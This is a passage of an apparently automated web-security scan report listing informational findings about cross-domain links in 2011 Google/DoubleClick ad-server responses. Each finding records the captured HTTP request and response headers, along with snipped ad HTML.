53DImageAd%2526gl%253DUS%26usg%3DAFQjCNEMuv7Ef4W4-lXF61njj9niyQeLWg&google_abg_img_url=http%3A//pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png&flash_element_id=google_flash_embed"><EMBED src="http://pagead2.googlesyndication.com/pagead/TemplateContainer.swf" id="google_flash_embed" WIDTH="728" HEIGHT="90" WMODE="opaque" FlashVars="google_xml_addata=%3CTEMPLATE_PARAMETERS%3E%3CNO_CONTAINER_XML/%3E%3CTEMPLATE_WIDTH%3E728%3C/TEMPLATE_WIDTH%3E%3CTEMPLATE_HEIGHT%3E90%3C/TEMPLATE_HEIGHT%3E%3CTEMPLATE_URL%3Ehttp%3A//pagead2.googlesyndication.com/pagead/gadgets/gen_V5/gen_V5_spec_728_90.swf%3C/TEMPLATE_URL%3E%3CTEMPLATE_AIT_URL%3Ehttp%3A//googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBMX94MO9zTvHFJ-eBgAL2l_HTBZG4ne8BiauXrR3AjbcBgIrNARABGAEgy5WvEzgAUK6h4qQEYMkGoAHt6vzpA7IBC3d3dy50bXouY29tugEJNzI4eDkwX2FzyAEE2gETaHR0cDovL3d3dy50bXouY29tL4ACAbgCGKgDAegDuAHoA_sD6APmAvUDAAgAgKAGGQ%26amp%3Bsigh%3DKzpVF3-mDYY%26amp%3Blabel%3D_AITNAME_%26amp%3Bvalue%3D_AITVALUE_%3C/TEMPLATE_AIT_URL%3E%3CTEMPLATE_ELEMENT+element_name%3D%22adData%22+index%3D%220%22%3E%3CTEMPLATE_FIELD+field_name%3D%22text1%22%3EVehicle+Tracking%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1Font%22%3Efranklingothic_h%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1Color%22%3E0x5F5F5F%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text2%22%3E3+Month%26%2339%3Bs+Free+Fleet+GPS+Tracking+%26amp%3B+Satellite+Navigation%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text2Font%22%3Efranklingothic_m%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text2Color%22%3E0xFFFFFF%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22logoUrl%22%3Ehttp%3A//pagead2.googlesyndication.com/pagead/imgad%3Fid%3DCKbv-_SnyNzxuwEQZBgfMghNys8X9CGlAg%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickText%22%3EGET+FREE+DEMO%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTextFont%22%3Efranklingothic_h%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTextColor%22%3E0xFFFFFF%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22buttonColor%22%3E0x5F5F5F%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22bgColor%22%3E0xFFFFFF%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22circle1Color%22%3E0x619153%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22circle2Color%22%3E0xFFFFFF%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22displayUrlColor%22%3E0x5F5F5F%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1FontName%22%3E_franklingothic_h%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1FontUrl%22%3Ehttp%3A//pagead2.googlesyndication.com/pagead/imgad%3Fid%3DCNvFmMqy3qHQpQEQ____________ARj___________8BMghsadwKF5q21A%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text2FontName%22%3E_franklingothic_m%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text2FontUrl%22%3Ehttp%3A//pagead2.googlesyndication.com/pagead/imgad%3Fid%3DCNvFmMqy3qHQpQEQ____________ARj___________8BMghsadwKF5q21A%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTextFontName%22%3E_franklingothic_h%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTextFontUrl%22%3Ehttp%3A//pagead2.googlesyndication.com/pagead/imgad%3Fid%3DCNvFmMqy3qHQpQEQ____________ARj___________8BMghsadwKF5q21A%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22displayUrl%22%3Ewww.teletrac.net%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22destinationUrl%22%3Ehttp%3A//www.teletrac.net/NewFreeLiveDemo/%3Fp%3Dwww.tmz.com%26amp%3Bs%3Dgoogle%26amp%3Bn%3DCONTEXTUAL_DISPLAY%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1X%22%3E-88%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1Y%22%3E5%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1Width%22%3E288.95%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22text1Height%22%3E31%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22logoUrlX%22%3E-219%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22logoUrlY%22%3E-27.5%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTextX%22%3E4%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTextY%22%3E5.3%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTextWidth%22%3E116%3C/TEMPLATE_FIELD%3E%3CTEMPLATE_FIELD+field_name%3D%22clickTextHeight%22%3E24.4%3C/TEMPLATE_FIELD%3E%3C/TEMPLATE_ELEMENT%3E%3C/TEMPLATE_PARAMETERS%3E&google_width=728&google_height=90&destination_url=http%3A//www.teletrac.net/NewFreeLiveDemo/%3Fp%3Dwww.tmz.com%26s%3Dgoogle%26n%3DCONTEXTUAL_DISPLAY&display_url=www.teletrac.net&google_click_url=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMX94MO9zTvHFJ-eBgAL2l_HTBZG4ne8BiauXrR3AjbcBgIrNARABGAEgy5WvEzgAUK6h4qQEYMkGoAHt6vzpA7IBC3d3dy50bXouY29tugEJNzI4eDkwX2FzyAEE2gETaHR0cDovL3d3dy50bXouY29tL4ACAbgCGKgDAegDuAHoA_sD6APmAvUDAAgAgKAGGQ%26num%3D1%26sig%3DAOD64_0HoVYvtsPJvXaPXWd7x2Z8BmWcoQ%26client%3Dca-pub-7832112837345590%26adurl%3D&google_ait_url=http%3A//googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBMX94MO9zTvHFJ-eBgAL2l_HTBZG4ne8BiauXrR3AjbcBgIrNARABGAEgy5WvEzgAUK6h4qQEYMkGoAHt6vzpA7IBC3d3dy50bXouY29tugEJNzI4eDkwX2FzyAEE2gETaHR0cDovL3d3dy50bXouY29tL4ACAbgCGKgDAegDuAHoA_sD6APmAvUDAAgAgKAGGQ%26sigh%3DKzpVF3-mDYY%26label%3D_AITNAME_%26value%3D_AITVALUE_&google_target_in_new_window=true&google_abg_url=http%3A//www.google.com/url%3Fct%3Dabg%26q%3Dhttps%3A//www.google.com/adsense/support/bin/request.py%253Fcontact%253Dabg_afc%2526url%253Dhttp%3A//www.tmz.com/%2526hl%253Den%2526client%253Dca-pub-7832112837345590%2526adU%253Dwww.teletrac.net%2526adT%253DImageAd%2526gl%253DUS%26usg%3DAFQjCNEMuv7Ef4W4-lXF61njj9niyQeLWg&google_abg_img_url=http%3A//pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png&flash_element_id=google_flash_embed" TYPE="application/x-shockwave-flash" AllowScriptAccess="always" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer"></EMBED>
...[SNIP]...

17.82. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1030395994297178&output=html&h=240&slotname=3904971778&w=120&lmt=1316257701&flash=10.3.183&url=http%3A%2F%2Fbostonherald.com%2Ftrack%2Finside_track%2Fview%2F20110907sox_with_heels%2F&dt=1316239699980&bpp=95&shv=r20110907&jsv=r20110914&prev_slotnames=8490313844&correlator=1316239700252&frm=4&adk=680252388&ga_vid=611537932.1316021623&ga_sid=1316239291&ga_hid=1496789190&ga_fc=1&u_tz=-300&u_his=15&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=10&biw=1071&bih=870&ref=http%3A%2F%2Fbostonherald.com%2Ftrack%2Finside_track%2Fview.bg%3Farticleid%3D1366225%26srvc%3Dtrack%26position%3D2&prodhost=googleads.g.doubleclick.net&fu=0&ifi=2&dtd=1734&xpc=xsg0MjCC4M&p=http%3A//bostonherald.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:48:31 GMT
Server: cafe
Cache-Control: private
Content-Length: 5782
X-XSS-Protection: 1; mode=block
Expires: Sat, 17 Sep 2011 01:48:31 GMT

<!doctype html><html><head><style>a{color:#006699}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="left:2px;position:absolute;top:1px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://bostonherald.com/track/inside_track/view/20110907sox_with_heels/%26hl%3Den%26client%3Dca-pub-1030395994297178%26adU%3Dwww.AceTicket.com%26adT%3DBoston%2BRed%2BSox%2BTickets%26gl%3DUS&amp;usg=AFQjCNHcM_zMaYBTvASonZ0m8bgwLYQc0g" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...

17.83. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1030395994297178&output=html&h=250&slotname=7623399685&w=300&lmt=1316257416&flash=10.3.183&url=http%3A%2F%2Fbostonherald.com%2Ftrack%2F&dt=1316239415981&bpp=192&shv=r20110907&jsv=r20110914&correlator=1316239416194&frm=4&adk=221221083&ga_vid=611537932.1316021623&ga_sid=1316239291&ga_hid=1386234336&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=0&adx=716&ady=1693&biw=1071&bih=870&eid=36887102&ref=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=810&xpc=ClrI3Ou09G&p=http%3A//bostonherald.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:02:11 GMT
Server: cafe
Cache-Control: private
Content-Length: 13637
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#b47b10}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="right:2px;position:absolute;top:2px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://bostonherald.com/track/%26hl%3Den%26client%3Dca-pub-1030395994297178%26adU%3DSportsManagement.lu-online.com%26adT%3DSports%2BManagement%2BDegree%26adU%3Dwww.ClassesUSA.com%26adT%3DTop%2B2011%2BOnline%2BGrants%26adU%3Dpepperdine.edu/masters-technology%26adT%3DMasters%2Bin%2BEDU%2BTechnology%26adU%3Dwww.AMUOnline.com/SportsManagement%26adT%3DOnline%2BSports%2BManagement%26gl%3DUS&amp;usg=AFQjCNEyHzfTE-f039IMVo70q8Gh4DrpMw" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

17.84. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=90&slotname=9104404504&w=728&lmt=1316257185&flash=10.3.183&url=http%3A%2F%2Fwww.toofab.com%2Fcategory%2Fceleb-couples%2F&dt=1316239185701&bpp=12&shv=r20110907&jsv=r20110914&correlator=1316239185724&frm=4&adk=3292020828&ga_vid=629016142.1316239186&ga_sid=1316239186&ga_hid=40476567&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=16&biw=1071&bih=870&ref=http%3A%2F%2Fwww.toofab.com%2Fnews%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=318&xpc=Kg9AY7g6bQ&p=http%3A//www.toofab.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:08:15 GMT
Server: cafe
Cache-Control: private
Content-Length: 8592
X-XSS-Protection: 1; mode=block
Expires: Sat, 17 Sep 2011 01:08:15 GMT

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Sep 12 11:47:05 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
253fhttp://sites.target.com/site/en/spot/page.jsp?title=newat&FlashExtra=/naturemade_vitamins/panel_1/&intc=null_dvmy110001000101000074_null&ref=tgt_adv_XCJS4617&afid=d_google&cpng=vfnaturemade&DFA=1"><img src="http://s0.2mdn.net/2906542/NM_Naturemade 728x90.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a>
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.toofab.com/category/celeb-couples/%26hl%3Den%26client%3Dca-pub-7832112837345590%26adU%3Dsites.target.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFdicn4ATAoFEqYxVEqaaDZ4wYvRQ" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110914/abg.js"></script>
...[SNIP]...

17.85. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1030395994297178&output=html&h=240&slotname=3904971778&w=120&lmt=1316257453&flash=10.3.183&url=http%3A%2F%2Fbostonherald.com%2Ftrack%2Fstar_tracks%2Fview%2F20110915cameron_and_tyler_winklevoss_to_star_in_tv_ad%2Fsrvc%3Dtrack%26position%3Dalso&dt=1316239451903&bpp=204&shv=r20110907&jsv=r20110914&prev_slotnames=8490313844&correlator=1316239451900&frm=4&adk=680252388&ga_vid=611537932.1316021623&ga_sid=1316239291&ga_hid=1847642670&ga_fc=1&u_tz=-300&u_his=6&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=10&adx=880&ady=861&biw=1071&bih=870&eid=36887102&ref=http%3A%2F%2Fbostonherald.com%2Ftrack%2F&prodhost=googleads.g.doubleclick.net&fu=0&ifi=2&dtd=1600&xpc=9Fw0n24cBJ&p=http%3A//bostonherald.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 01:02:47 GMT
Server: cafe
Cache-Control: private
Content-Length: 7274
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#006699}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
<div style="left:2px;position:absolute;top:1px"><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://bostonherald.com/track/star_tracks/view/20110915cameron_and_tyler_winklevoss_to_star_in_tv_ad/srvc%253Dtrack%2526position%253Dalso%26hl%3Den%26client%3Dca-pub-1030395994297178%26adU%3Dwww.NationalTVspots.com%26adT%3DWholesale%2BTV%2BAdvertising%26adU%3Dgoldmansachs.com/progress%26adT%3DCreating%2Bthe%2BYES%2BNetwork%26gl%3DUS&amp;usg=AFQjCNHS2IEU5xNq_rJRnrg-Kwc5tsX9HA" target=_blank><img alt="AdChoices" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/adc-en-100c-000000.png" ></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script>
...[SNIP]...

17.86. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7188170409&w=300&lmt=1316257133&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2Fsignin%2F&dt=1316239133320&bpp=8&shv=r20110907&jsv=r20110914&prev_slotnames=9104404504&correlator=1316239131660&frm=4&adk=1782629760&ga_vid=1986127593.1316239132&ga_sid=1316239132&ga_hid=1800675763&ga_fc=0&u_tz=-300&u_his=14&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&biw=1071&bih=870&eid=36887101&ref=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%2F%3Fadid%3Dhero1&prodhost=googleads.g.doubleclick.net&fu=0&ifi=2&dtd=367&xpc=gaHmKc0R6o&p=http%3A//www.tmz.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:57:28 GMT
Server: cafe
Cache-Control: private
Content-Length: 3749
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.tmz.com/signin/%26hl%3Den%26client%3Dca-pub-7832112837345590%26adU%3Dwww.Google.com/Apps/Business%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGWWgG15tuAFl7qh3_ECt71WMza1g" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110914/abg.js"></script>
...[SNIP]...

17.87. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-7832112837345590&output=html&h=250&slotname=7921874644&w=300&lmt=1316256809&flash=10.3.183&url=http%3A%2F%2Fwww.tmz.com%2F&dt=1316238809104&bpp=20&shv=r20110907&jsv=r20110914&prev_slotnames=9104404504%2C7188170409&correlator=1316238804075&frm=4&adk=2480033491&ga_vid=1637260738.1316238804&ga_sid=1316238804&ga_hid=348414659&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=14&biw=1071&bih=870&prodhost=googleads.g.doubleclick.net&fu=0&ifi=3&dtd=530&xpc=9DqgIeUTI9&p=http%3A//www.tmz.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 17 Sep 2011 00:52:04 GMT
Server: cafe
Cache-Control: private
Content-Length: 3641
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=functio
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.tmz.com/%26hl%3Den%26client%3Dca-pub-7832112837345590%26adU%3Dwww.vistaprint.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNETFaiQn0tz1K4aQMtFDrorpKt7WA" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110907/r20110914/abg.js"></script>
...[SNIP]...

17.88. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-1030395994297178&output=html&h=280&slotname=8490313844&w=336&lmt=1316257349&flash=10.3.183&url=http%3A%2F%2Fbostonherald.com%2Fnews%2Fcolumnists%2Fview.bg%3Farticleid%3D1366212&dt=1316239348847&bpp=152&shv=r20110907&jsv=r20110914&correlator=1316239349010&frm=4&adk=1829132337&ga_vid=611537932.1316021623&ga_sid=1316239291&ga_hid=1950598959&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=arial&dfs=12&adx=77&ady=1604&biw=1071&bih=870&eid=36887102&ref=http%3A%2F%2Fbostonherald.com%2Fnews%2Fregional%2Fview.bg%3Farticleid%3D1366356%26position%3D1&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=570&xpc=7t3FP3KEnl&p=http%3A//bostonherald.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
